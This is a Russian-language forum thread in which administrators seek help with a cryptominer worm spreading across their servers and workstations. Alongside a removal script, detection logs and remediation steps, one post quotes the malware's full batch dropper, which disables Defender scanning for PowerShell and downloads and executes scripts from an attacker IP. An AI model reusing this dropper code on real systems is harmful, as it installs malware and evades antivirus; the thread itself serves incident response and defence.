HKLM\Software\...\AppCompatFlags\InstalledSDB\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}: [DatabasePath] -> C:\Windows\AppPatch\Custom\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb [2021-08-27]
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
End::


2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную после данного скрипта.


 

Поясните пожалуйста, что делает указанный Вами код.

У нас минимум двадцать серверов оказались атакованы данным зловредом, не говоря уже про клиентские машины. 

Основная задача - уяснить суть атаки и путь исправления, чтобы тиражировать это решение на остальных машинах.

 

27.08.2021 в 23:35, mike 1 сказал:

Если у вас расширенная лицензия Endpoint Security, то как вариант на рабочих станциях так: 

 

image.thumb.png.8c1d2d58a67e558998a9f02ae95eae6e.png

 

Для защиты серверов можно использовать проверку опасных скриптов, либо блочить через контроль программ. Замок только закройте. 

 

  image.thumb.png.eaa3dffd731560cf1355fe9af38bb117.png

На компьютерах ранее стоял Symantec, который в данном случае не помог.

Сейчас установлено следующее ПО Касперского:

Клиентские машины: Kaspersky Security Cloud Free

Cервера: Каspersky Security for Windows Server 11.0.1.897, у которого в разделе "Постоянная защита сервера" отсутствует пункт "Проверка скриптов", а пункт "Контроль запуска программ" неактивен (Запуск задачи запрещен лицензией.).

Kaspersky server скрин.jpg

Ссылка на комментарий
Поделиться на другие сайты
Burila Новичок

Burila

Опубликовано
  • Автор
Опубликовано

Продолжаем разговор.

 

Все выходные продолжали борьбу с заразой на местах.
Отметили закономерность: если клиентская машина была ранее заражена, то после пролечивания отсутствует паразитная загрузка мощностей компьютера, но в логах "Мониторинг активности" Kaspersky Security Cloud Free содержатся регулярные записи об обнаружении/запрещении зловреда:
Пользователь: NT AUTHORITY\система
Тип пользователя: Системный пользователь
Название: PDM:Exploit.Win32.Generic
Путь к объекту: c:\windows\system32
Имя объекта: cmd.exe (или wmiprvse.exe)

 

На пролеченных серверах ситуация аналогичная: нагрузка отсутствует, но установленный  Каspersky Security for Windows Server периодически режет попытки вылезти в интернет:
Событие: Обнаружен веб-адрес.
Объект: http://fastrepunicat.spdns.org:8000/in6.ps1 (или http://45.10.69.139:8000/in6.ps1)
Имя процесса: wmiprvse.exe

 

В процессе поиска и отсева информации о похожих случаях выделил для себя несколько статей:

«Лаборатория Касперского» обнаружила критическую уязвимость в Windows, которой успели воспользоваться неизвестные злоумышленники
https://www.kaspersky.ru/about/press-releases/2019_kaspersky-lab-uncovers-critical-vulnerability-in-windows-os-exploited-by-an-unknown-criminal-group

Handling a distributed cryptominer AD worm
https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/

Методы защиты от mimikatz в домене Windows
https://winitpro.ru/index.php/2017/08/24/metody-zashhity-ot-mimikatz-v-domene-windows/

 

Дальше идет полёт фантазии, поэтому большими буквами пишу: ГИПОТЕТИЧЕСКИ схема заражения и распространения в нашем случае могла выглядеть следующим образом:
1. Заразился компьютер без антивируса.
2. При помощи mimikatz вирь получил пароль пользователей на машине, в частности - локального администратора.
3. После начал расползаться по сети. Есть подозрение, что при этом используется удалённое управление посредством WMI. Возможно при этом еще используется psexec.exe и уязвимость SMBv1

Например: зная пароль локального администратора, зараженная машина даёт команду удаленной машине вылезти в интернет, скачать и запустить вирус-майнер. 
Это объясняет ситуацию, при которой на серверах стоят антивирусы, машины вроде пролеченные, но в логах Касперского на них регулярно появляются сообщения о том, что под администраторской учеткой эксплуатируются WMI-уязвимости и выявлены попытки ломиться в интернет на непонятный адрес.

 

Исходя из данной версии было принято решение действовать следующим образом:
1. Запретить на пограничных с интернетом устройствах обращение на порт 8000 в общем и к пулам 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255 в частности. 
2. Машины отключить от локальной сети.
3. Прогнать проверку Drweb CurIT, KVRT. Проверка может быть быстрой, после каждой проверки - перезагрузка.
4. Установить патч CVE-2019-0859
5. Установить патч MS17-010
6. Включить локальную сеть, запустить полную антивирусную проверку Касперского.
7. Изменить пароль локального администратора. На клиентских машинах пароль будет один, на серверах - другой. Более того, пароль в каждом филиале будет свой.

 

В рамках эксперимента седьмой пункт было решено отложить "на сладкое".
И зря, потому что после пролечивания двумя утилитами подряд, установкой патчей и полной проверки компьютера, доложившей об отсутствии угроз, этот же компьютер чуть позже уведомил, что в системной памяти обнаружен Trojan.Multi.GenAutorunReg.c

 

После данной подлянки поменяли всем пароли локальных админов по указанной выше схеме.

И, о чудо, гадские записи об обнаружении зловредов исчезли!

 

Обрадованные тем, что нащупали алгоритм купирования и изничтожения заразы, приступили к проведению работ на остальных компьютерах.

Но радость была недолгой - примерно два дня, потому что сегодня в другом офисе на одной из обработанных по схеме машин вышло сообщение Kaspersky Security Free Cloud:
У программы обнаружено подозрительное поведение, характерное для вредоносной программы:
Обнаружено: PDM:Trojan.Win32.Generic
Расположение: c:\windows\temp\sysupdater0.bat

 

На этой машине Каспер файл казнил, но такой же нашелся на одном из серверов.
Вот текст (для удобства изучения добавлена табуляция):

 

setlocal EnableDelayedExpansion & for /f "tokens=2 delims=.[" %%i in ('ver') do (set a=%%i)&if !a:~-1!==5 
(
    @echo on error resume next>%windir%\11.vbs&
    @echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&
    @echo ox.open "GET","http://45.10.69.139:8000/info.vbs",false>>%windir%\11.vbs&
    @echo ox.send^(^)>>%windir%\11.vbs&
    @echo If ox.Status=200 Then>>%windir%\11.vbs&
    @echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&
    @echo oas.Open>>%windir%\11.vbs&
    @echo oas.Type=1 >>%windir%\11.vbs&
    @echo oas.Write ox.ResponseBody>>%windir%\11.vbs&
    @echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&
    @echo oas.Close>>%windir%\11.vbs&
    @echo End if>>%windir%\11.vbs&
    @echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&
    @echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&
    cscript.exe %windir%\11.vbs

else 
(
    setlocal DisableDelayedExpansion&powershell "Add-MpPreference -ExclusionProcess
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; 
    $aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ))
    ;if(($aa -eq $null) -or !$aa.contains('SCM Event8 Log')) 
    {
        if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64'))
        {
            IEX(New-Object Net.WebClient).DownloadString('http://45.10.69.139:8000/in6.ps1')
        }
        else
        {
            IEX(New-Object Net.WebClient).DownloadString('http://45.10.69.139:8000/in3.ps1')
        }
    }"
)

 

Вопросы остаются всё те же. Подскажите пожалуйста:

  1. Как эта гадость распространяется?
  2. Что необходимо сделать для того, чтобы остановить распространение?
  3. Как вычистить зловред из системы и предотвратить повторное заражение?

Заранее спасибо.
 

Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано
9 часов назад, Burila сказал:

Как эта гадость распространяется?

Очевидно, что через уязвимости и патчи безопасности лучше ставить все доступные, а не несколько патчей. 

 

9 часов назад, Burila сказал:

Что необходимо сделать для того, чтобы остановить распространение?

Использовать подходящее решение для корпоративной среды, а не домашний антивирус, который не имеет централизованного управления и единых политик безопасности. Включить UAC, отобрать у юзеров права администратора. 

 

9 часов назад, Burila сказал:

Как вычистить зловред из системы и предотвратить повторное заражение?

Начать с установки корпоративного антивируса. Если сеть большая, то лучше KES. 

  • Спасибо (+1) 1
Ссылка на комментарий
Поделиться на другие сайты
Андрей_mon Новичок

Андрей_mon

Опубликовано
Опубликовано (изменено)

У нас аналогичная проблема.

Для решения запретили выполнение Powershell политиками, но от пользователя "система" он все равно запускается

я так понял, что с каждого компьютера в скрипте powershell запускается сканирование портов 135-139 и 445 по всем адресам класса С, таким образом он распространяется

Думаю, что надо блокировать входящие порты, чтобы он не распространялся далее и убивать процессы powershell.exe и schtasks.exe

Если будет какое-то действенное решение - отпишусь здесь. Буду рад выслушать советы 

Кстати, страдают компьютеры на Windows 7, Server 2012, и Win10, где по каким то причинам был выключен MS Defender

Изменено пользователем Андрей_mon
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • vlanzzy
      Вредоносное заражение с task.vbs
      От vlanzzy
      CollectionLog-2024.12.19-19.35.zip
      Произошло заражение вирусом, выполнял проверку через KVRT и смог удалить вирусы, но теперь запускается task.vbs
       
    • LorianThet
      Заражение трояном MEM:Trojan.Win32.SEPEH.gen
      От LorianThet
      Добрый день, ПК заразился трояном
      После попытки полечить с помощью kaspersky ghb gthtpfuheprt Windows выдаёт ошибку, после включения ПК троян появился снова
      Прилагаю логи, отчёт по трояну из антивируса Касперского и образ автозапуска системы uVS
      CollectionLog-2024.12.08-21.50.zip HOME-PC_2024-12-08_21-41-10_v4.99.4v x64.7z антивируса Касперского отчёт.txt
    • rottingcorpse
      заражение trojan.win32.sepeh и Trojan.Win32.Miner
      От rottingcorpse
      fff.zip
    • yare4kaa
      Вирусные заражения системы, торможения
      От yare4kaa
      Здравствуйте, был в рейсе и не чистил пк от вирусов, заразился много фигней, нужна помощь специалистов.
      Логи ниже CollectionLog-2024.11.25-18.32.zip
    • Asya
      Возможное заражение трояном
      От Asya
      Здравствуйте, уважаемые консультанты. Появилась необходимость обратиться к вам за советом. Очень надеюсь на вашу помощь. 
      Ситуация следующая:
      На смартфон в телеге было скачано два файла epub (электронные книги) из чата по англо-китайским книжкам. После, через соцсети файлы переброшены на ноутбук. 
      27.09 - скачана первая книга. Проверка Kaspersky Security Cloud дала добро, и файл был открыт. 
      20.10 - скачана вторая книга. Проверка Касперского - окей, но ещё закидываю файл на Virustotal - и вот тут обнаруживается единственное (1/64) срабатывание у китайского Kingsoft - пишет что в файле HTA trojan. Сразу удаляю файл и перепроверяю первую книгу - результат такой же, Kingsoft ругается, остальные антивирусы молчат.
      Другие файлы, из того же чата, скачанные ранее - все целиком чистые, реакт есть только на те два файла.     
      Я бы подумала на ложное срабатывание, но вдруг вспомнила, что:
      15.10 - на мой номер телефона пришло смс с кодом верификации от китайского Wechat (которым не пользуюсь уже 10 лет) и который, естественно, не запрашивала. 
      Плюсом последние несколько дней на одну из почт (моего основного гугл-аккаунта) сыпется нервирующий иностранный спам (раньше такого не было). 

      Ноутбук проверяла своим Kaspersky Security Cloud, KVRT, Dr.Web Cureit - в них всё чисто, ничего не обнаруживается. 
       
      И теперь сомневаюсь, то ли это просто совпадение, то ли мне попался какой-то хитрый китайский вирус, который ещё никто из антивирусов не видит. И где его теперь искать: на компьютере или на смартфоне (и вот с последним я вообще не знаю, что делать)? Не очень хочется думать, что какие-то китайцы таскают мои данные. 
      Буду очень благодарна, если сможете помочь и подсказать, есть ли следы вирусной активности. Заранее спасибо за уделённое время. 
      CollectionLog-2024.11.02-23.04.zip
×
×
  • Создать...